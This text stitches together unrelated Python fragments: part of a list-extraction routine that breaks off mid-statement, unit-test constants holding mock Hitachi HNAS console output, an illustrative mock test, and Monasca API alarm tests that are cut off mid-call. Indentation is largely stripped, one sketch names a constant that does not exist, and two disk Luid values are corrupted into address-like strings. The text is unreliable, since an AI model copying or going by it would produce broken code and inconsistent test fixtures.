visible_string = ''.join([meta['visible_text'] for meta in visible_list])
elif template_list and visible_string != ''.join([meta['visible_text'] for meta in visible_list]):
template_list = False
#find the beginning of the first row at the same DOM level that splits the first and second rows
if first_depth:
depth = 0
done = False
for meta in metas[page][first_index::-1]:
for tag in reversed(meta['tags']):
match = re.search(r'<(/?)([\w\-]+).*?(/?)>', tag)
if match.group(2) not in void_tags and not match.group(3):
if match.group(1):
depth += 1
else:
depth -= 1
if depth <= first_depth:
first_elems[0] = meta
done = True
break
if done:
break
if not done:
first_elems[0] = metas[page][0]
#find the end of the last row at the same DOM level that splits the last and second to last rows
depth = 0
done = False
prev_meta = metas[page][last_index]
for meta in metas[page][last_index+1:]:
for tag in meta['tags']:
match = re.search(r'<(/?)([\w\-]+).*?(/?)>', tag)
if match.group(2) not in void_tags and not match.group(3):
if match.group(1):
depth -= 1
if depth <= last_depth:
first_elems.append(prev_meta)
done = True
break
else:
depth += 1
if done:
break
prev_meta = meta
if not done:
first_elems.append(prev_meta)
prev_elem = None
lists[page][list_id] = {'sequence':[]}
for num, elem in enumerate(first_elems):
#print elem['visible_text']
if prev_elem:
if num == len(first_elems) - 1:
row_data = {
'extract': pages[page].tokens.getTokensAsString(prev_elem['first_vis_token_loc'],
elem['last_vis_token_loc']+1, True),
'sequence_number': num,
'starting_token_location': prev_elem['first_vis_token_loc']
}
else:
row_data = {
'extract': pages[page].tokens.getTokensAsString(prev_elem['first_vis_token_loc'],elem['first_vis_token_loc'], True),
'sequence_number': num,
'starting_token_location': prev_elem['first_vis_token_loc']
}
lists[page][list_id]['sequence'].append(row_data)
lists[page][list_id]['ending_token_location'] = elem['last_vis_token_loc']+1
prev_elem = elem
lists[page][list_id]['starting_token_location'] = lists[page][list_id]['sequence'][0]['starting_token_location']
else:
lists[page][list_id] = {}
lists[page][list_id]['starting_token_location'] = marker['first_vis_token_loc']
lists[page][list_id]['ending_token_location'] = marker['last_vis_token_loc']+1
return template_list
@staticmethod
def find_row_marker(spans):
#only look for markers that appear on every page
terminals = set()
first = True
for span in spans:
span_terminals = set()
for element in span:
span_terminals.update(element)
if first:
terminals = span_terminals
first = False
else:
terminals.intersection_update(span_terminals)
best_marker = None
#terminals = sorted(terminals, key=lambda x: x.rjust(3, '0'))
most_predictions = 0
for row_marker in terminals:
predictions = None
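# 'predictions' appears to track labels whose occurrence count is identical in
# every fold seen so far, mirroring the intersection scheme used in cluster_all.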
#get the strings that appear between each pair of row markers
folds = []
for span in spans:
fold = None
count = 0
for word in span:
if row_marker in word:
if fold:
folds.append(fold)
count+=1
fold = [word]
elif fold:
fold.append(word)
#if there are not a certain number of folds on average, it's probably not a list
if len(folds) > 1.25 * len(spans):
#find the items which we can predict exactly how many times they appear between each pair of markers
for fold in folds:
counts = dict()
for word in fold:
for label in word:
if label in counts:
counts[label] += 1
elif label != row_marker:
counts[label] = 1
if predictions is
# delfin/tests/unit/drivers/hitachi/hnas/constants.py
# Copyright 2021 The SODA Authors.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
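# The constants below are mock inputs for the HNAS driver unit tests; the
# multi-line strings look like raw console captures returned by stubbed SSH commands.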
ACCESS_INFO = {
"storage_id": "12345",
"vendor": "hitachi",
"model": "hnas",
"ssh": {
"host": "192.168.3.211",
"port": 22,
"username": "manager",
"password": "<PASSWORD>",
}
}
STORAGE_INFO = """\r
cluster-show\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ cluster-show\r
Overall Status = Online\r
Cluster Health = Robust\r
Cluster Mode = Not clustered\r
Cluster Name = pba-hnas-1\r
Cluster UUID = a39f815a-e582-11d6-9000-b76f3098a657\r
Cluster Size = 1\r
Node Name = pba-hnas-1-1\r
Node ID = 1\r
Cluster GenId = 1\r
Cluster Master = No\r
\r
pba-hnas-1-1:$ """
VERSION_INFO = """\r
ver\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ ver\r
\r
Model: HNAS 4060\r
\r
Software: 12.7.4221.12 (built 2016-10-28 21:51:37+01:00)\r
\r
Hardware: NAS Platform (M4SJKW1423160)\r
\r
board MMB1\r
mmb 12.7.4221.12 release (2016-10-28 21:51:37+01:00)\r
\r
board MFB2\r
mfb2hw MB v0132 WL v0132 TD v0132 FD v0132 TC v00C6 RY v00C6 \r
TY v00C6 IC v00C6 WF v007C FS v007C OS v007C WD v007C D0 v0077 \r
Serial no B1423125 (Tue Jun 17 13:38:33 2014)\r
\r
board MCP\r
Serial no B1423160 (Wed Jun 18 20:39:53 2014)\r
\r
pba-hnas-1-1:$ """
LOCATION_INFO = """\r
system-information-get\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ system-information-get\r
\r
Name: pba-hnas-1\r
Location: chengdu\r
Contact: \r
\r
pba-hnas-1-1:$ """
DISK_INFO = """\r
sd-list --scsi\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ sd-list --scsi\r
Device ID: 0\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:00\r
Blocksize: 512\r
Superflush: Default\r
Lun: 0\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0000\r
HDS dev name: 1000\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 1\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:01\r
Blocksize: 512\r
Superflush: Default\r
Lun: 1\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0400\r
HDS dev name: 1001\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 2\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:02\r
Blocksize: 512\r
Superflush: Default\r
Lun: 2\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0000\r
HDS dev name: 1002\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 3\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:03\r
Blocksize: 512\r
Superflush: Default\r
Lun: 3\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0400\r
HDS dev name: 1003\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 4\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:04\r
Blocksize: 512\r
Superflush: Default\r
Lun: 4\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 1004\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 5\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b:20:32:66:00:00:10:05\r
Blocksize: 512\r
Superflush: Default\r
Lun: 5\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 1005\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 6\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:06\r
Blocksize: 512\r
Superflush: Default\r
Lun: 6\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 1006\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 7\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:07\r
Blocksize: 512\r
Superflush: Default\r
Lun: 7\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 1007\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 8\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:08\r
Blocksize: 512\r
Superflush: Default\r
Lun: 8\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 1008\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 9\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:09\r
Blocksize: 512\r
Superflush: Default\r
Lun: 9\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 1009\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 10\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:0A\r
Blocksize: 512\r
Superflush: Default\r
Lun: 10\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 100A\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 11\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]fc00:db20:35b:7399::5:50:20:32:66:00:00:10:0B\r
Blocksize: 512\r
Superflush: Default\r
Lun: 11\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 100B\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
pba-hnas-1-1:$ """
POOL_INFO = """\r
span-list\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ span-list\r
Span instance name OK? Free Cap/GiB System drives Con\r
--------------------- --- ---- ------- ------------------------- ---\r
span1 Yes 100% 200 0,1,2,3 90%\r
Tier 0: empty: file systems can't be created or mounted\r
Tier 1: capacity 200GiB; free: 200GiB (100%); HDP pool free 996GiB\r
span2 Yes 86% 400 4,5,6,7;8,9,10,11 90%\r
pba-hnas-1-1:$ """
POOL_DETAIL_INFO = """\r
\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ span-space-distribution\r
Span span2:\r
\r
How each stripeset is used:\r
Stripeset 0:\r
18GiB 9.09% fs1\r
18GiB 9.09% fs2\r
18GiB 9.09% fs3\r
145GiB 72.74% [Free space]\r
Stripeset 1:\r
200GiB 100.00% [Free space]\r
\r
Where each filesystem resides:\r
Filesystem fs1:\r
Stripeset 0 18GiB 100.00%\r
Filesystem fs2:\r
Stripeset 0 18GiB 100.00%\r
Filesystem fs3:\r
Stripeset 0 18GiB 100.00%\r
\r
Span span1:\r
\r
How each stripeset is used:\r
Stripeset 0:\r
200GiB 100.00% [Free space]\r
\r
Where each filesystem resides:\r
\r
pba-hnas-1-1:$"""
ALERT_INFO = """\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ event-log-show -w -s\r
****** Current time : 2021-10-25 11:12:35+08:00 ******\r
8208 Information 2021-11-02 08:26:01+08:00 Chassis device 'md0'
is running background media scan.\r
CAUSE: Chassis drive volume is running a media check.\r
RESOLUTION: No Action required.\r
\r
8462 Warning 2021-11-02 08:00:10+08:00 [ pba-hnas-1 ] The
SMU does not have an email
alert profile relating to a managed server.\r
CAUSE: An email alert profile relating to a managed
server must be applied to the SMU so that alert and diagnostic
emails can be sent to the required recipients.\r
RESOLUTION: Go to an SMTP Email Profile page and apply a
profile to the SMU.\r
\r
8208 Information 2021-11-02 04:04:01+08:00 Chassis device 'md2'
is running background media scan.\r
CAUSE: Chassis drive volume is running a media check.\r
RESOLUTION: No Action required.\r
\r
8209 Information 2021-11-02 04:04:00+08:00 Chassis device 'md3'
has completed background media scan.\r
CAUSE: Chassis drive volume media check has completed.\r
RESOLUTION: No Action required.\r
\r
9995 Information 2021-11-01 20:50:36+08:00 wq test snmp.\r
CAUSE: A test event was requested.\r
RESOLUTION: No action required.\r
\r
3303 Information 2021-11-01 19:27:22+08:00 Exceeded socket backlog:
dropping additional connection request from 127.0.0.1:34008->127.0.0.1:206:
this event, Id 3303, happened once in the last 6.25 d on the MMB1.\r
CAUSE: Socket backlogged: could not allow a new connection.\r
RESOLUTION: This is expected behavior on receiving a flurry of
connection requests. If it happens in other circumstances,
run the Performance Info Report, then report this and send the
PIR results to your support provider.\r
\r
8208 Information 2021-11-01 16:44:01+08:00 Chassis device 'md3' is
running background media scan.\r
CAUSE: Chassis drive volume is running a media check.\r
RESOLUTION: No Action required.\r
\r
8462 Warning 2021-11-01 08:00:10+08:00 [ pba-hnas-1 ] The SMU
does not have an email alert profile relating to a managed server.\r
CAUSE: An email alert profile relating to a managed server
must be applied to the SMU so that alert and diagnostic emails
can
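# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original sources): the HNAS console
# captures above (CLUSTER_INFO, VERSION_INFO, LOCATION_INFO, DISK_INFO,
# POOL_INFO, ...) are the kind of canned output a unit test replays instead of
# talking to a real array. The HnasCollector class and its run_command hook
# below are hypothetical stand-ins for whatever code actually issues the
# console commands; only the mocking pattern is the point.
import re
import unittest
from unittest import mock


class HnasCollector(object):
    """Hypothetical wrapper around an HNAS console session."""

    def run_command(self, command):
        # In real code this would write to an SSH channel; tests replace it.
        raise NotImplementedError

    def get_location(self):
        output = self.run_command('system-information-get')
        match = re.search(r'^\s*Location:\s*(\S+)', output, re.MULTILINE)
        return match.group(1) if match else None


# Shortened stand-in for the LOCATION_INFO capture above.
FAKE_LOCATION_INFO = (
    'pba-hnas-1-1:$ system-information-get\r\n'
    '  Name: pba-hnas-1\r\n'
    '  Location: chengdu\r\n'
    '  Contact: \r\n'
)


class HnasCollectorTest(unittest.TestCase):
    def test_get_location_parses_fixture(self):
        collector = HnasCollector()
        # Replay the canned console output instead of opening a session.
        with mock.patch.object(collector, 'run_command',
                               return_value=FAKE_LOCATION_INFO):
            self.assertEqual(collector.get_location(), 'chengdu')


if __name__ == '__main__':
    unittest.main()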
# -*- coding: utf-8 -*-
# Copyright 2015 Cray Inc.
# (C) Copyright 2015,2017 Hewlett Packard Enterprise Development LP
# Copyright 2016-2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
import copy
import datetime
import json
import falcon.testing
import fixtures
import testtools.matchers as matchers
from mock import Mock
import oslo_config.fixture
import six
from monasca_api.common.repositories.model import sub_alarm_definition
from monasca_api.tests import base
from monasca_api.v2.common.exceptions import HTTPUnprocessableEntityError
from monasca_api.v2.reference import alarm_definitions
from monasca_api.v2.reference import alarms
CONF = oslo_config.cfg.CONF
TENANT_ID = u"fedcba9876543210fedcba9876543210"
ALARM_HISTORY = OrderedDict((
# Only present in data returned from InfluxDB:
(u"time", u"2015-01-01T00:00:00.000Z"),
# Only present in data returned from API:
(u"timestamp", u"2015-01-01T00:00:00.000Z"),
(u"alarm_id", u"10000000-1000-1000-1000-10000000000"),
(u"metrics", [{
u"id": None,
u"name": u"test.metric",
u"dimensions": {u"dim1": u"dval1", u"dim2": u"dval2"}
}]),
(u"new_state", u"ALARM"),
(u"old_state", u"OK"),
(u"reason", u"Alarm reason"),
(u"reason_data", u"{}"),
(u"sub_alarms", [{
u"sub_alarm_expression": {
u"function": u"MAX",
# Only present in data returned from InfluxDB:
u"metric_definition": {
u"id": None,
u"name": u"test.metric",
u"dimensions": {u"dim1": u"dval1"},
},
# Only present in data returned from API:
u'metric_name': u'test.metric',
# Only present in data returned from API:
u'dimensions': {u'dim1': u'dval1'},
u"operator": u"GT",
u"threshold": 50.0,
u"period": 60,
u"periods": 1
},
u"sub_alarm_state": u"ALARM",
u"current_values": [50.1],
}]),
# Only present in data returned from InfluxDB:
(u"tenant_id", TENANT_ID),
# Only present in data returned from API:
(u"id", u"1420070400000"),
))
class InfluxClientAlarmHistoryResponseFixture(fixtures.MockPatch):
def _build_series(self, name, column_dict):
return {
"name": name,
"columns": column_dict.keys(),
"values": [column_dict.values(), ],
}
def _setUp(self):
super(InfluxClientAlarmHistoryResponseFixture, self)._setUp()
mock_data = copy.deepcopy(ALARM_HISTORY)
del mock_data[u"id"]
del mock_data[u"timestamp"]
del mock_data[u"sub_alarms"][0][u"sub_alarm_expression"][u"metric_name"]
del mock_data[u"sub_alarms"][0][u"sub_alarm_expression"][u"dimensions"]
mock_data[u"sub_alarms"] = json.dumps(mock_data[u"sub_alarms"])
mock_data[u"metrics"] = json.dumps(mock_data[u"metrics"])
self.mock.return_value.query.return_value.raw = {
"series": [self._build_series("alarm_state_history", mock_data)]
}
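    # Note: the dict assigned to `raw` above mirrors the raw result shape of
    # the influxdb client's query(): a "series" list whose entries carry a
    # measurement name plus parallel "columns"/"values" sequences. Keeping the
    # mock in that exact shape lets the repository code under test run
    # unchanged against canned data.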
class RESTResponseEquals(object):
"""Match if the supplied data contains a single string containing a JSON
object which decodes to match expected_data, excluding the contents of
the 'links' key.
"""
def __init__(self, expected_data):
self.expected_data = expected_data
if u"links" in expected_data:
del expected_data[u"links"]
def __str__(self):
        return 'RESTResponseEquals(%s)' % (self.expected_data,)
def match(self, actual):
response_data = actual.json
if u"links" in response_data:
del response_data[u"links"]
return matchers.Equals(self.expected_data).match(response_data)
class AlarmTestBase(base.BaseApiTestCase):
def setUp(self):
super(AlarmTestBase, self).setUp()
self.useFixture(fixtures.MockPatch(
'monasca_api.common.messaging.kafka_publisher.KafkaPublisher'))
# [messaging]
self.conf_override(
driver='monasca_api.common.messaging.'
'kafka_publisher:KafkaPublisher',
group='messaging')
# [repositories]
self.conf_override(
alarms_driver='monasca_api.common.repositories.sqla.'
'alarms_repository:AlarmsRepository',
group='repositories')
self.conf_override(
alarm_definitions_driver='monasca_api.common.repositories.'
'alarm_definitions_repository:'
'AlarmDefinitionsRepository',
group='repositories')
self.conf_override(
metrics_driver='monasca_api.common.repositories.influxdb.'
'metrics_repository:MetricsRepository',
group='repositories')
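    # The overrides above point the messaging and repository options at the
    # concrete driver classes, so the objects patched per test case (Kafka
    # publisher, SQLAlchemy alarm repositories, InfluxDB metrics repository)
    # are exactly the ones the resources instantiate.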
class TestAlarmsStateHistory(AlarmTestBase):
def setUp(self):
super(TestAlarmsStateHistory, self).setUp()
self.useFixture(fixtures.MockPatch(
'monasca_api.common.repositories.sqla.'
'alarms_repository.AlarmsRepository'))
self.useFixture(InfluxClientAlarmHistoryResponseFixture(
'monasca_api.common.repositories.influxdb.'
'metrics_repository.client.InfluxDBClient'))
self.alarms_resource = alarms.AlarmsStateHistory()
self.app.add_route(
'/v2.0/alarms/{alarm_id}/state-history/', self.alarms_resource)
self.app.add_route(
'/v2.0/alarms/state-history/', self.alarms_resource)
def test_alarm_state_history(self):
expected_elements = {u"elements": [dict(ALARM_HISTORY)]}
del expected_elements[u"elements"][0][u"time"]
del (expected_elements[u"elements"][0][u"sub_alarms"][0]
[u"sub_alarm_expression"][u"metric_definition"])
del expected_elements[u"elements"][0][u"tenant_id"]
response = self.simulate_request(
path=u'/v2.0/alarms/%s/state-history/' % ALARM_HISTORY[u"alarm_id"],
headers={
'X-Roles': CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID,
})
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_alarm_state_history_no_alarm_id(self):
expected_elements = {u'elements': []}
response = self.simulate_request(
path=u'/v2.0/alarms/state-history/',
headers={
'X-Roles': CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID,
})
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
class TestAlarmsCount(AlarmTestBase):
def setUp(self):
super(TestAlarmsCount, self).setUp()
self.alarms_get_alarms_count_mock = self.useFixture(fixtures.MockPatch(
'monasca_api.common.repositories.sqla.alarms_repository.AlarmsRepository'
)).mock
self.alarms_count_resource = alarms.AlarmsCount()
self.app.add_route('/v2.0/alarms/count',
self.alarms_count_resource)
def test_get_alarm_count(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_state_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='state=OK')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_severity_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='severity=LOW')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_group_by_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'columns': ['count', 'metric_name'],
'counts': [[2, 'cpu.idle_perc'],
[1, 'cpu.sys_mem']]}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2},
{'metric_name': u'cpu.sys_mem', 'count': 1}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
expected_elements = {'columns': ['count', 'metric_name', 'dimension_name'],
'counts': [[2, 'cpu.idle_perc', 'hostname'],
[1, 'cpu.sys_mem', 'hostname']]}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc',
'dimension_name': 'hostname',
'count': 2},
{'metric_name': u'cpu.sys_mem',
'dimension_name': 'hostname',
'count': 1}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name,dimension_name')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_incorrect_group_by_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2},
{'metric_name': u'cpu.sys_mem', 'count': 1}]
response = self.simulate_request(
path='/v2.0/alarms/count',
headers={'X-Roles': CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=hahahah')
self.assertEqual(response.status, falcon.HTTP_422)
def test_get_alarm_count_offset(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'columns': ['count', 'metric_name'],
'counts': [[2, 'cpu.idle_perc']]}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name&offset=1')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_incorrect_offset(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'description': 'Offset must be a valid integer, was hahahah',
'title': 'Unprocessable Entity'}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name&offset=hahahah')
self.assertEqual(response.status, falcon.HTTP_422)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_limit_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='limit=1')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
return_value.get_alarms_count.return_value = [{'count': 4}]
expected_elements = {'counts': [], 'columns': ['count']}
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='limit=0')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_when_count_is_zero(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'columns': ['count', 'metric_name'], 'counts': [[0, None]]}
return_value.get_alarms_count.return_value = [{'count': 0}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
expected_elements = {'columns': ['count'], 'counts': [[0]]}
response = self.simulate_request(path='/v2.0/alarms/count',
